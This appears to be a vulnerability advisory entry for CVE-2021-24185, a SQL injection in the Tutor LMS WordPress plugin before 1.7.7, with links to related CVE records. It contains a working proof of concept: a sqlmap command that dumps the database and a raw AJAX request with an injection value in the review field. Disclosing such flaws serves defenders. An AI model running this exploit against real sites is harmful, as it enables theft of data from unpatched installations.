Lucene search
Chloe ChamberlandWPEX-ID:0CBA5349-E916-43F0-A1FE-62CF73E352A2HistoryMar 15, 2021 - 12:00 a.m.
Tutor LMS < 1.7.7 - SQL Injection via tutor_place_rating
2021-03-1500:00:00
Chloe Chamberland
124
0.001 Low
EPSS
Percentile
35.9%
The tutor_place_rating AJAX action from the plugin was vulnerable to blind and time based SQL injections that could be exploited by students.
python3 sqlmap.py -r ~/tutor2.txt --dbms=mysql --technique=B -p course_id --dump
Where tutor2.txt is
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: [URL]
Content-Length: 69
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: [URL]
Referer: [URL]/courses/first-class/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [STUDENTCOOKIES]
Connection: close
course_id=26&rating=5&review=%3B'&action=tutor_place_ratingRelated
cvelist
cvelist
CVE-2021-24185 Tutor LMS < 1.7.7 - SQL Injection via tutor_place_rating
2021-04-05 18:27:45
cve
cve
CVE-2021-24185
2021-04-05 19:15:16
nvd
nvd
CVE-2021-24185
2021-04-05 19:15:16
wpvulndb
wpvulndb
Tutor LMS < 1.7.7 - SQL Injection via tutor_place_rating
2021-03-15 00:00:00
prion
prion
Sql injection
2021-04-05 19:15:00